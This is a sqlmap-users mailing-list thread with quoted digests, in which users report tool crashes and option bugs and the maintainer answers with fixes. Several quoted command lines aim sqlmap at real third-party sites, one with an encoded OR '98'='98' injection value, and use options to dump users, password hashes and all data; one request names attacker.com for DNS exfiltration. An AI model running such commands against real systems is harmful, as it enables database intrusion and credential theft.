>>> raise GeneralProxyError((5, _generalerrors[5]))
>>> GeneralProxyError: (5, 'bad input')
>>>
>>>
>>>
>>>
>>> ------------------------------
>>>
>>> Message: 8
>>> Date: Tue, 16 Apr 2013 14:19:18 +0200
>>> From: Miroslav Stampar <mir...@gm...>
>>> Subject: Re: [sqlmap-users] --host parameter
>>> To: co...@5i...
>>> Cc: SqlMap List <sql...@li...>
>>> Message-ID:
>>> <CA+...@ma...>
>>> Content-Type: text/plain; charset="iso-8859-1"
>>>
>>> Hi.
>>>
>>> Thank you for your report and find it fixed with the latest commit [1].
>>>
>>> Kind regards,
>>> Miroslav Stampar
>>>
>>> [1]
>>>
>>> https://github.com/sqlmapproject/sqlmap/commit/6fed1921edf1baaf23a54fbe340ff3781fc05c86
>>>
>>>
>>> On Mon, Apr 15, 2013 at 11:01 PM, <co...@5i...> wrote:
>>>
>>> > Hello,
>>> > the --host doesn't work as expected, or I am doing something wrong:
>>> >
>>> >
>>> > this works as expected:
>>> >
>>> > ./sqlmap.py --url='http://i.csland.ro/index.php?id=0'
>>> >
>>> > sqlmap/1.0-dev-840ee26 - automatic SQL injection and database
>>> > takeover tool
>>> > http://sqlmap.org
>>> >
>>> > [!] legal disclaimer: Usage of sqlmap for attacking targets without
>>> > prior mutual consent is illegal. It is the end user's responsibility to
>>> > obey all applicable local, state and federal laws. Developers assume no
>>> > liability and are not responsible for any misuse or damage caused by
>>> > this program
>>> >
>>> > [*] starting at 23:57:15
>>> >
>>> > [23:57:15] [INFO] testing connection to the target URL
>>> > [23:57:15] [INFO] heuristics detected web page charset 'ascii'
>>> > [23:57:15] [INFO] testing if the target URL is stable. This can take a
>>> > couple of seconds
>>> > [23:57:16] [INFO] target URL is stable
>>> > [23:57:16] [INFO] testing if GET parameter 'id' is dynamic
>>> > [23:57:16] [INFO] confirming that GET parameter 'id' is dynamic
>>> > [23:57:16] [INFO] GET parameter 'id' is dynamic
>>> > [23:57:16] [INFO] heuristic (basic) test shows that GET parameter 'id'
>>> > might be injectable (possible DBMS: 'MySQL')
>>> > [23:57:16] [INFO] testing for SQL injection on GET parameter 'id'
>>> >
>>> >
>>> > ....
>>> >
>>> >
>>> > this doesn't work as expected:
>>> >
>>> > ./sqlmap.py --host='i.csland.ro'
>>> > --url='http://188.240.236.15/index.php?id=0'
>>> >
>>> > sqlmap/1.0-dev-840ee26 - automatic SQL injection and database
>>> > takeover tool
>>> > http://sqlmap.org
>>> >
>>> > [!] legal disclaimer: Usage of sqlmap for attacking targets without
>>> > prior mutual consent is illegal. It is the end user's responsibility to
>>> > obey all applicable local, state and federal laws. Developers assume no
>>> > liability and are not responsible for any misuse or damage caused by
>>> > this program
>>> >
>>> > [*] starting at 23:58:03
>>> >
>>> > [23:58:03] [INFO] testing connection to the target URL
>>> > [23:58:03] [CRITICAL] page not found (404)
>>> > it is not recommended to continue in this kind of cases. Do you want to
>>> > quit and make sure that everything is set up properly? [Y/n]
>>> > [23:58:05] [WARNING] HTTP error codes detected during run:
>>> >
>>> > ............
>>> >
>>> >
>>> > Of course i.csland.ro resolves to 188.240.236.15. Any idea?
>>> >
>>> > Thanks.
>>> >
>>> >
>>> >
>>> >
>>> ------------------------------------------------------------------------------
>>> > Precog is a next-generation analytics platform capable of advanced
>>> > analytics on semi-structured data. The platform includes APIs for
>>> building
>>> > apps and a phenomenal toolset for data science. Developers can use
>>> > our toolset for easy data analysis & visualization. Get a free account!
>>> > http://www2.precog.com/precogplatform/slashdotnewsletter
>>> > _______________________________________________
>>> > sqlmap-users mailing list
>>> > sql...@li...
>>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>> >
>>>
>>>
>>>
>>> --
>>> Miroslav Stampar
>>> http://about.me/stamparm
>>> -------------- next part --------------
>>> An HTML attachment was scrubbed...
>>>
>>> ------------------------------
>>>
>>> Message: 9
>>> Date: Tue, 16 Apr 2013 14:33:33 +0200
>>> From: Miroslav Stampar <mir...@gm...>
>>> Subject: Re: [sqlmap-users] Sqlmap and direct connect error
>>> To: ???????? ?????? <vo...@s2...>
>>> Cc: SqlMap List <sql...@li...>
>>> Message-ID:
>>> <CA+9yoX0rxH+=vZuYiArFNZhK1xhwos=SNhMqEmFmnCafw-ot=g...@ma...>
>>> Content-Type: text/plain; charset="koi8-r"
>>>
>>> Hi Vladimir.
>>>
>>> Find it "patched" with the latest commit [1]. Basically, those
>>> combinations
>>> should not be allowed (-d and --url; -d and --tor; etc.) and now we've
>>> added new option validation checks for this kind of cases.
>>>
>>> Kind regards,
>>> Miroslav Stampar
>>>
>>> [1]
>>>
>>> https://github.com/sqlmapproject/sqlmap/commit/c73489aff3861f1cac7de41494a296c1095e141a
>>>
>>>
>>> On Tue, Apr 16, 2013 at 12:12 AM, ???????? ?????? <vo...@s2...> wrote:
>>>
>>> > Hi!
>>> >
>>> > This bug detected if add direct param.
>>> >
>>> > python sqlmap.py -d "mysql://yakimov:pass@127.0.0.1:3306/tech" -u "
>>> > http://s25.ru/index.phtml?center=7&id=186" --random-agent --tor
>>> > --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables
>>> > --exclude-sysdbs
>>> >
>>> >
>>> > [01:48:28] [CRITICAL] unhandled exception in sqlmap/1.0-dev-de99717,
>>> retry
>>> > your run with the latest development version from the GitHub
>>> repository. If
>>> > the exception persists, please send by e-mail to '
>>> > sql...@li...' or open a new issue at '
>>> > https://github.com/sqlmapproject/sqlmap/issues/new' with the following
>>> > text and any information required to reproduce the bug. The developers
>>> will
>>> > try to reproduce the bug, fix it accordingly and get back to you.
>>> > sqlmap version: 1.0-dev-de99717
>>> > Python version: 2.7.3
>>> > Operating system: posix
>>> > Command line: sqlmap.py -d
>>> > **************************************************** -u
>>> > http://s25.ru/index.phtml?center=7&id=186 --random-agent --tor
>>> > --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables
>>> > --exclude-sysdbs
>>> > Technique: None
>>> > Back-end DBMS: MySQL (identified)
>>> > Traceback (most recent call last):
>>> > File "sqlmap.py", line 87, in main
>>> > start()
>>> > File "/home/yakimov/sqlmap/lib/controller/controller.py", line 248, in
>>> > start
>>> > action()
>>> > File "/home/yakimov/sqlmap/lib/controller/action.py", line 32, in
>>> action
>>> > setHandler()
>>> > File "/home/yakimov/sqlmap/lib/controller/handler.py", line 95, in
>>> > setHandler
>>> > conf.dbmsConnector.connect()
>>> > File "/home/yakimov/sqlmap/plugins/dbms/mysql/connector.py", line 38,
>>> in
>>> > connect
>>> > self.connector = pymysql.connect(host=self.hostname, user=self.user,
>>> > passwd=self.password, db=self.db, port=self.port,
>>> > connect_timeout=conf.timeout, use_unicode=True)
>>> > File
>>> >
>>> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/__init__.py",
>>> > line 93, in Connect
>>> > return Connection(*args, **kwargs)
>>> > File
>>> >
>>> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py",
>>> > line 584, in __init__
>>> > self._connect()
>>> > File
>>> >
>>> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py",
>>> > line 739, in _connect
>>> > sock.connect((self.host, self.port))
>>> > File "/home/yakimov/sqlmap/thirdparty/socks/socks.py", line 365, in
>>> > connect
>>> > raise GeneralProxyError((5, _generalerrors[5]))
>>> > GeneralProxyError: (5, 'bad input')
>>> >
>>> >
>>> >
>>> >
>>> ------------------------------------------------------------------------------
>>> > Precog is a next-generation analytics platform capable of advanced
>>> > analytics on semi-structured data. The platform includes APIs for
>>> building
>>> > apps and a phenomenal toolset for data science. Developers can use
>>> > our toolset for easy data analysis & visualization. Get a free account!
>>> > http://www2.precog.com/precogplatform/slashdotnewsletter
>>> > _______________________________________________
>>> > sqlmap-users mailing list
>>> > sql...@li...
>>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>> >
>>>
>>>
>>>
>>> --
>>> Miroslav Stampar
>>> http://about.me/stamparm
>>> -------------- next part --------------
>>> An HTML attachment was scrubbed...
>>>
>>> ------------------------------
>>>
>>> Message: 10
>>> Date: Tue, 16 Apr 2013 23:26:39 +0200
>>> From: buawig <bu...@gm...>
>>> Subject: [sqlmap-users] feature request: offline mode for
>>> --dns-domain?
>>> To: SqlMap List <sql...@li...>
>>> Message-ID: <516...@gm...>
>>> Content-Type: text/plain; charset=UTF-8
>>>
>>> -----BEGIN PGP SIGNED MESSAGE-----
>>> Hash: SHA512
>>>
>>> Hi,
>>>
>>> in cases where sqlmap is run against targets on internal networks it
>>> would be great if one could tell sqlmap to simply proceed without
>>> expecting incoming DNS requests, because sqlmap can not be executed
>>> directly on the DNS server (which can't reach the target, but the
>>> target can reach the DNS server).
>>>
>>> For me it would be enough to simply run something like
>>> - -u ... --dns-domain=attacker.com --dns-port=0
>>> (--dns-port does not exist [yet])
>>>
>>> to let sqlmap know that it doesn't need to start a DNS listener.
>>>
>>> I would then collect and decode the DNS querries on the DNS server
>>> manually, but I could also envision running a second sqlmap instance
>>> on the DNS server with --dns-domain (but without -u) doing that job.
>>>
>>> -----BEGIN PGP SIGNATURE-----
>>>
>>> iQIcBAEBCgAGBQJRbcIPAAoJEJeRHQyF0ukM/VwQAKlZKRyuk55ZbiOzbRPztw/p
>>> dGHg7KLwPJ5fM9uXDNodO7cdZF18x6EJOjTJwu6sRNvUwjiAWb7VwAB6HLcts8Qf
>>> WXQL5OUBEzJiYJ/XUVZonPvw+PGc781rNTJDnbW3RKSQK8Hd7T5TgfDE0ucqTCRz
>>> cJ1NbcDswrCQNZtKr09SRW9kxk1QfHsbAGfQYpQh0LrIR3cTageFPLJ+hosMF+VU
>>> uoEiu6k9JJwbWlKCMu2uz/UrLRqdt7VtjhkpbLSLMBL/IOnfTHfdQ37NRYcJIkos
>>> D/sZIyA0MT/woN25rVVDAhxwVZ2MFcxn7eMKXZCxv5VpXZKQxeMtew8maDBwom5C
>>> JdM+bF6AoE56zqi/+qaYajPmO0GYQXy26YUhbRJUufF2ThSTTWnmgZ8QH6fKUbfN
>>> QTGbXyH/FbaXDMDokEButCcrD1PCpvklfz44VU7zi0zG/wBN+mnleT24bvW1tbhx
>>> J1vCEbXWEFCfxwCqTDopLHaGNkIlo4oH4PUsIyW1FlTYQRqH5cUe2bV1F0XcP3/O
>>> yNyHZmLMGtPdEvJ+Wkx8Bp4gcUC2ikKlS6H85TMDu6GxS5oi7EK+kGnJ+njhPeaF
>>> plSWWJFQHEm0DJ/ZCGjgzZyvS8QzK7WDfplpR/TBrc3uOLXZVqDhPW4IkLLc49Vz
>>> N5xHRCVPLLSrPfTPiyIJ
>>> =JSkD
>>> -----END PGP SIGNATURE-----
>>>
>>>
>>>
>>> ------------------------------
>>>
>>> Message: 11
>>> Date: Tue, 16 Apr 2013 23:24:23 +0200
>>> From: buawig <bua...
 
[truncated message content]

[sqlmap-users] sqlmap- error

[B. <sto...@qq...>]

Hi friends,


   I have use sqlmap . with the latest version .


it occur the problem .


Could you can fix this for me?


thanks 


best regards 


Robert 


[16:17:09] [CRITICAL] unhandled exception in sqlmap/1.0-dev-c181e90, retry your run with the latest development version from the GitHub repository. If the exception persists, please send by e-mail to 'sql...@li...' or open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev-c181e90
Python version: 2.7.3
Operating system: posix
Command line: ./sqlmap.py -u *******************************************************************  -p id --dbms=MySQL --risk=3 --level=5 -a
Technique: UNION
Back-end DBMS: MySQL (fingerprinted)
Traceback (most recent call last):
  File "./sqlmap.py", line 99, in main
    start()
  File "/pentest1/database/sqlmap/sqlmap-dev/lib/controller/controller.py", line 585, in start
    action()
  File "/pentest1/database/sqlmap/sqlmap-dev/lib/controller/action.py", line 130, in action
    conf.dbmsHandler.dumpAll()
  File "/pentest1/database/sqlmap/sqlmap-dev/plugins/generic/entries.py", line 367, in dumpAll
    self.getTables()
  File "/pentest1/database/sqlmap/sqlmap-dev/plugins/generic/databases.py", line 215, in getTables
    dbs = self.getDbs()
  File "/pentest1/database/sqlmap/sqlmap-dev/plugins/generic/databases.py", line 175, in getDbs
    kb.data.cachedDbs = list(set(kb.data.cachedDbs))
TypeError: unhashable type: 'list'



------------------
 



 




------------------ 原始邮件 ------------------
发件人: "Miroslav Stampar";<mir...@gm...>;
发送时间: 2014年5月13日(星期二) 晚上9:40
收件人: "Bob"<sto...@qq...>; 
抄送: "SqlMap List"<sql...@li...>; 
主题: Re: 回复： [sqlmap-users] sqlmap-user event not found error



Hi Bob.

It's a bash problem (reproduced it this moment). Using single quotes (') instead of double quotes (") should solve this issue.


Kind regards,
 Miroslav Stampar



On Tue, May 13, 2014 at 5:05 AM, Bob <sto...@qq...> wrote:
 

Hi Miroslav,


   Thanks for your email, 


but still the same after i tried  sqlmap  -u ".." 
 





sqlmap -u "http://www.xxxx.com/xxx/xxxx/default!search.do?keyword=&toUrl=http%3A%2F%2Fwww.diylooks.com%2Foem%2Fproduct%2Fdefault%21view.do%3Fid%3D270549&qty=1&input_mailbar=98%22%20OR%20%2298%22%3D%2298&input_mail=aa" 
 bash: !search.do?keyword=: event not found





best regards 
bob
------------------
  



 




------------------ 原始邮件 ------------------
 发件人: "Miroslav Stampar";<mir...@gm...>;
发送时间: 2014年5月11日(星期天) 晚上10:38
收件人: "Bob"<sto...@qq...>; 
 抄送: "SqlMap List"<sql...@li...>; 
主题: Re: [sqlmap-users] sqlmap-user event not found error
 


Hi Bob.

Please enclose the url part with quotes (e.g. ./sqlmap.py -u "..." ...)


Kind regards,
Miroslav Stampar

  

On Sun, May 11, 2014 at 8:32 AM, Bob <sto...@qq...> wrote:
 Hi friend,


 I have problem with ! inside URL .


/sqlmap.py -u http://www.xxxx.com/xxx/xxxx/default!search.do?keyword=&toUrl=http%3A%2F%2Fwww.diylooks.com%2Foem%2Fproduct%2Fdefault%21view.do%3Fid%3D270549&qty=1&input_mailbar=98%22%20OR%20%2298%22%3D%2298&input_mail= -p input_mailbar --dbms=MySQL --risk=3 --level=5 -o --param-del=
 bash: !search.do?keyword=: event not found



How should i do ? 


thanks 


bob 
 ------------------
 



 




------------------ Original ------------------
 From:  "Miroslav Stampar";<mir...@gm...>;
Date:  Fri, May 31, 2013 03:00 AM
To:  "Bob"<sto...@qq...>; 
 Cc:  "sqlmap-users"<sql...@li...>; 
Subject:  Re: [sqlmap-users] sqlmap-users Digest, Vol 31, Issue 1
 


Hi.
 
Have you been able to retrieve user names normally? I mean, were they normally been displayed in console output?
 
Also, is boolean technique the only one detected by sqlmap in your case (or maybe UNION)?
  
Kind regards,
Miroslav Stampar



On Thu, May 30, 2013 at 4:57 PM, Bob <sto...@qq...> wrote:
 
Hi friend,




   Could you help me with this bug ?




[22:54:12] [CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your run with the latest development version from the GitHub repository. If the exception persists, please send by e-mail to 'sql...@li...' or open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
 sqlmap version: 1.0-dev
Python version: 2.7.3
Operating system: posix
Command line: ./sqlmap -u *********************************************** --data=__VIEWSTATE=%2FwEPDwUJNzcyNzA5MTcxD2QWAmYPZBYCAgMPZBYCAgUPZBYCAg8PPCsAEQIADxYEHgtfIURhdGFCb3VuZGceC18hSXRlbUNvdW50ZmQBEBYAFgAWAGQYAQUaY3RsMDAkTWFpbkNvbnRlbnQkRGdSZXN1bHQPPCsADAEIZmTqSkxVHfCvk8H514IG2vidRqlanHHD7kZRl389CeOupw%3D%3D&__EVENTVALIDATION=%2FwEWCAK%2BjdvyCQLM8NjFBQKgo%2F%2FzCgKumJP3BALizcLsAwL%2Bq8zvCgKsq6%2F4DwLTytO4BPwtq4Qe7jKJMNFTIKI0vDR6PinuEV%2BLf13FWcmth6Av&ctl00%24MainContent%24TxtContCode=ZAP&ctl00%24MainContent%24TxtItemCode=ZAP&ctl00%24MainContent%24BtnFind=%E6%9F%A5%E8%AF%A2&ctl00%24MainContent%24TxtTestCustname=ZAP&ctl00%24MainContent%24TxtItemName=ZAP&ctl00%24MainContent%24TxtCheckManuCrock=ZAP&ctl00%24MainContent%24TxtCheckNo=ZAP -p ctl00%24MainContent%24TxtContCode -o --level 3 --risk 5 --dbms=Microsoft SQL Server --users --passwords
 Technique: BOOLEAN
Back-end DBMS: Microsoft SQL Server (fingerprinted)
Traceback (most recent call last):
  File "./sqlmap", line 87, in main
    start()
  File "/usr/share/sqlmap/lib/controller/controller.py", line 572, in start
     action()
  File "/usr/share/sqlmap/lib/controller/action.py", line 81, in action
    conf.dbmsHandler.getPasswordHashes(), "password hash", CONTENT_TYPE.PASSWORDS)
  File "/usr/share/sqlmap/plugins/generic/users.py", line 243, in getPasswordHashes
     if user in retrievedUsers:
TypeError: unhashable type: 'list'

[*] shutting down at 22:54:12

Thanks 



 BOB
  


 




------------------ Original ------------------
 From:  "sqlmap-users-request"<sql...@li...>;
Date:  May 29, 2013
 To:  "sqlmap-users"<sql...@li...>; 
Subject:  sqlmap-users Digest, Vol 31, Issue 1
 


Send sqlmap-users mailing list submissions to
	sql...@li...

To subscribe or unsubscribe via the World Wide Web, visit
 	https://lists.sourceforge.net/lists/listinfo/sqlmap-users
or, via email, send a message with subject or body 'help' to
 	sql...@li...

You can reach the person managing the list at
	sql...@li...
 
When replying, please edit your Subject line so it is more specific
than "Re: Contents of sqlmap-users digest..."


Today's Topics:

   1. Re: Feature request (David Guimaraes)
   2. Re: --load-cookies (Dirk Wetter)
    3. Re: --load-cookies (Miroslav Stampar)
   4. Re: Patch for /task/<task_id>/delete in	clean_filesystem
      (Miroslav Stampar)
   5. Re: --load-cookies (Dirk Wetter)
   6. --host parameter (co...@5i...)
    7. Sqlmap and direct connect error (???????? ??????)
   8. Re: --host parameter (Miroslav Stampar)
   9. Re: Sqlmap and direct connect error (Miroslav Stampar)
  10. feature request: offline mode for --dns-domain? (buawig)
   11. feature request: --dns-domain for non-root users	(--dns-port)
      (buawig)
  12. Domain credentials (Brian Milliron)
  13. Re: Domain credentials (Brandon Perry)
  14. Re: feature request: offline mode for --dns-domain?
       (Miroslav Stampar)
  15. Re: Domain credentials (Miroslav Stampar)
  16. Re: feature request: fetch DNS queries from DNS server via
      HTTP (buawig)
  17. Re: feature request: fetch DNS queries from DNS server via
       HTTP (Miroslav Stampar)
  18. MySQL error based technique bug (Konrads Smelkovs)
  19. Re: MySQL error based technique bug (Miroslav Stampar)
  20. SQLmap crashing (Phillip Wylie)
  21. Re: SQLmap crashing (Miroslav Stampar)
   22. Custom injection payload in POST (Marcell Fodor)
  23. Re: SQLmap crashing (Miroslav Stampar)
  24. I got error on windows (warezhacking)
  25. Appending to a dump (Stephen Shkardoon)
  26. Re: Appending to a dump (Miroslav Stampar)
   27. Re: Appending to a dump (Stephen Shkardoon)
  28. Re: Appending to a dump (Miroslav Stampar)
  29. --ignore-404 ? (buawig)
  30. PostgreSQL: substr('string', 1, 1) vs. substring('string'
       from 1 for 1) (buawig)
  31. Re: PostgreSQL: substr('string', 1, 1) vs. substring('string'
      from 1 for 1) (Miroslav Stampar)
  32. Re: PostgreSQL: substr('string', 1, 1) vs. substring('string'
       from 1 for 1) (Miroslav Stampar)
  33. Re: --ignore-404 ? (Miroslav Stampar)
  34. BUG...!!!! o.O (Isai Ofir Juarez Contreras)
  35. Re: BUG...!!!! o.O (Miroslav Stampar)
  36. gun...@gm... wants to follow you. Accept?
       (gun...@gm...)
  37. Direct access to mysql database (Marcell Fodor)
  38. Re: Direct access to mysql database (Miroslav Stampar)
  39. ? Sqlmap Users, Marco Mirandola ti ha inviato un messaggio...
       (Badoo)
  40. Not getting any sensitive data from database (Marcell Fodor)
  41. Re: Not getting any sensitive data from database
      (Miroslav Stampar)
  42. unhandled exception (kvasilopoulos)
  43. [SQLMAP] Unhandled exception for IPv6
       (e.n...@st...)
  44. Re: [SQLMAP] Unhandled exception for IPv6 (Miroslav Stampar)
  45. Re: unhandled exception (Miroslav Stampar)
   46. Passing SOAPAction in --header (Brandon Perry)
  47. Re: Passing SOAPAction in --header (Miroslav Stampar)
  48. Re: [SQLMAP] Unhandled exception for IPv6 (Miroslav Stampar)
  49. Blind SQL Injection question (Guy Dufour)
   50. Re: Blind SQL Injection question (Chris Oakley)
  51. Re: Passing SOAPAction in --header (Brandon Perry)
  52. Re: Passing SOAPAction in --header (Brandon Perry)
  53. Deploy&Create SSH/tunnel with compromised MSSQL	server
       (Alok Kumar)
  54. Re: Deploy&Create SSH/tunnel with compromised MSSQL	server
      (Brandon Perry)
  55. Re: Deploy&Create SSH/tunnel with compromised MSSQL	server
      (Alok Kumar)
  56. Re: Deploy&Create SSH/tunnel with compromised MSSQL	server
       (Brandon Perry)
  57. SQLMAP Bug (Joe O'Hara)
  58. Re: SQLMAP Bug (Miroslav Stampar)
  59. [CRITICAL] (Thai Thao)
  60. Re: [CRITICAL] (Miroslav Stampar)
  61. Providing multiple dbms (Sebastian Nerz)
   62. Re: Providing multiple dbms (Miroslav Stampar)


----------------------------------------------------------------------

Message: 1
Date: Sat, 13 Apr 2013 21:40:39 -0300
From: David Guimaraes <sk...@gm...>
 Subject: Re: [sqlmap-users] Feature request
To: Miroslav Stampar <mir...@gm...>
Cc: SqlMap List <sql...@li...>
 Message-ID:
	<CAJ...@ma...>
Content-Type: text/plain; charset="iso-8859-1"
 
Good question Miroslav.. I tried to think in something that can be
implemented without ruin sqlmap query schema, but I could not come to any
conclusion... =(

The thing is, sqlsus use a different approch to dump the data, making this
 kind of thing possible...

The solution that I found in this particular scenario is to use sqlsus,
unfortunately...

Regards.

David


On Mon, Apr 1, 2013 at 6:35 PM, Miroslav Stampar <mir...@gm...
 > wrote:

> Hi David.
>
> And what do you recommend to be done in case of query with length >
> max_inj_length?
>
> Kind regards,
> Miroslav Stampar
> On Apr 1, 2013 11:14 PM, "David Guimaraes" <sk...@gm...> wrote:
 >
>> Hi, I am trying to perform sql injection on a web site but I can not get
>> successful due to a size limitation on the query sent to the server. The
>> server is limiting the size of query in 512 bytes only and sqlmap do not
 >> have any customization that allows me to bypass this restriction like
>> sqlsus "max_inj_length" parameter. Sqlsus has a feature called "autoconf"
>> that measure the permited query size.
 >>
>> There is some chance to put this kind of feature in sqlmap?
>>
>> Thanks.
>>
>> --
>> David Gomes Guimar?es
>>
>>
>> ------------------------------------------------------------------------------
 >> Own the Future-IntelLevel Up Game Demo Contest 2013
>> Rise to greatness in Intel's independent game demo contest.
>> Compete for recognition, cash, and the chance to get your game
 >> on Steam. $5K grand prize plus 10 genre and skill prizes.
>> Submit your demo by 6/6/13. http://p.sf.net/sfu/intel_levelupd2d
>> _______________________________________________
 >> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
 >>
>>


-- 
David Gomes Guimar?es
-------------- next part --------------
An HTML attachment was scrubbed...

------------------------------

Message: 2
Date: Mon, 15 Apr 2013 11:36:37 +0200
 From: Dirk Wetter <sp...@dr...>
Subject: Re: [sqlmap-users] --load-cookies
To: Miroslav Stampar <mir...@gm...>
 Cc: SqlMap List <sql...@li...>
Message-ID: <516...@dr...>
 Content-Type: text/plain; charset=ISO-8859-1



On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
> Nevertheless, with the latest commit that check should be "neutralized" now. Could you please retry it now?
 
thx, Miroslav.  I tried (b6fee63) but this time the cookie parser lib hiccups, using the same file:

/usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib bug!
Traceback (most recent call last):
   File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in _really_load
    assert domain_specified == initial_dot
AssertionError

  _warn_unhandled_exception()
[11:13:26] [CRITICAL] there was a problem loading cookies file ('invalid Netscape format cookies file '/tmp/sqlmapcj-pbP7P1': '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')
 
the 999.. looks strange to me.

>  
>
> On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <mir...@gm... <mailto:mir...@gm...>> wrote:
 >
>     Hi Dirk.
>      
>     Well, I would say that you have an expired cookie. Do you see that value 0? That value should be a valid UNIX time representing time of cookie expiration. Also, I've just tested that cookie of yours and sqlmap says: "[WARNING] cookie '....' has expired"
 >

that's true but IMO 0 represents just a session cookie. Example:

prompt% wget -q -O /dev/null --keep-session-cookies --save-cookies=/dev/stdout bing.com
 # HTTP cookie file.
# Generated by Wget on 2013-04-15 11:23:13.
# Edit at your own risk.

.bing.com       TRUE    /       FALSE   1429089794      SRCHUSR AUTOREDIR=0&GEOVAR=&DOB=20130415
 .bing.com       TRUE    /       FALSE   1429089794      SRCHD   D=2781203&MS=2781203&AF=NOFORM
.bing.com       TRUE    /       FALSE   1429089794      OrigMUID        333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
 .bing.com       TRUE    /       FALSE   1429089794      MUID    333995A69E06630B2EB491169F016314
.bing.com       TRUE    /       FALSE   0       _SS     SID=B954CB7EDF8643CABAD8013F27A241E7
 .bing.com       TRUE    /       FALSE   0       _HOP
.bing.com       TRUE    /       FALSE   0       _FS     NU=1
.bing.com       TRUE    /       FALSE   1429089794      _FP     EM=1
 www.bing.com    FALSE   /       FALSE   1429089794      SRCHUID V=2&GUID=975091780DFF407DA9DD07139FD97C4D
www.bing.com    FALSE   /       FALSE   1429089794      MUIDB   333995A69E06630B2EB491169F016314
 
prompt%

Same parser problem btw if I edit the cookie file and put 1429089794 unix time instead of 0 in there.

Ok: With the prev rev  ed5599f it reads this file ok (no session cookies but cookies w/ expiration date) and uses the last
 cookie only for the first 120 tries.

Cheers, Dirk


>      
>     Kind regards,
>     Miroslav Stampar
>
>
>     On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr... <mailto:sp...@dr...>> wrote:
 >
>
>         Hi Miroslav,
>
>         thx for your prompt answer.
>
>         On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
>         > Hi Dirk.
>         >
 >         > Could you please get the latest revision and retry it again?
 >         ed5599f: almost the same: with cookie in the header sqlmap takes only this one.
>         The slight difference seems to be that in the case where I didn't supply a cookie
>         sqlmap doesn't use any cookie at all, i.e. now not the one from the server anymore.
 >         >
>         > There was a situation where info messages have been wrongly written that original response contained Set-Cookie in situations like yours.
>         >
>         > In case that everything stays as it is, I'll need to ask you to provide more details. For example, cookie file would be great.
 >
>         sure, here you go:
>
>         --snip
>         # Netscape HTTP Cookie File
>         <FQDN>  \t  FALSE  \t  <path>  \t  TRUE  \t  0  \t  JSESSIONID  \t  <Cookie>
 >         [..]
>         --snap
>
>         They are all session cookies. For easier reading here I put some blanks in the line
>         above, in "cookie-file" there aren't any though. Cookies were generated with
 >         stompy and a shell script (looks he same as with
>         wget -S -O /dev/null --keep-session-cookies --save-cookies=<file> <URL>)
>
>         Again: sqlmap doesn't hiccup/complain while eating my cookies file ;-)
 >
>         >
>         > Also, please make sure that the cookie file contains proper cookie(s) - domain name should be the same as a domain of target, cookie needs to have a proper valid time, etc.
 >
>         see above.
>
>         Cheers,
>
>         Dirk
>
>         >
>         >
>         > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>> wrote:
 >         >
>         >     Hi Miroslav,
>         >
>         >     yes unfortunately.
>         >
>         >     If I omit the cookie line in the request header completely, sqlmap
 >         >     seems to take the first cookie issued by the server with set-cookie (and
>         >     put's it silently in).
>         >
>         >     Cheers,
>         >
 >         >     Dirk
>         >
>         >
>         >
>         >     On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
>         >     > Hi.
>         >     >
 >         >     > And this is also happening if you are skipping "Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request?
>         >     >
>         >     > Kind regards,
 >         >     > Miroslav Stampar
>         >     >
>         >     >
>         >     > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>> <mailto:sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>>> wrote:
 >         >     >
>         >     >
>         >     >     Hi folks,
>         >     >
>         >     >     .... that doesn't work for me. It always uses the cookie supplied
 >         >     >     (below in $REQUEST, or if I omit the line in $REQUEST the one
>         >     >     from the 1st server reply is being used)
>         >     >
>         >     >     So what is wrong in here:
 >         >     >
>         >     >     cd ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
>         >     >     ./sqlmap.py --ignore-proxy --force-ssl --beep \
>         >     >       --threads=8 -v 6 --load-cookies=$WD/cookie-file \
 >         >     >       --level=2 --risk=2 -r $REQUEST
>         >     >
>         >     >     The content of the file $REQUEST is:
>         >     >
>         >     >     POST <URL> HTTP/1.1
 >         >     >     Host: <HOST>
>         >     >     User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.13 (KHTML, like Gecko)
>         >     >     Chrome/0.2.149.6 <http://0.2.149.6> <http://0.2.149.6> <http://0.2.149.6> Safari/525.13
 >         >     >     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>         >     >     Accept-Language: en-US,en;q=0.5
>         >     >     Accept-Encoding: gzip, deflate
 >         >     >     Referer: <Referer>
>         >     >     Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
>         >     >     Connection: keep-alive
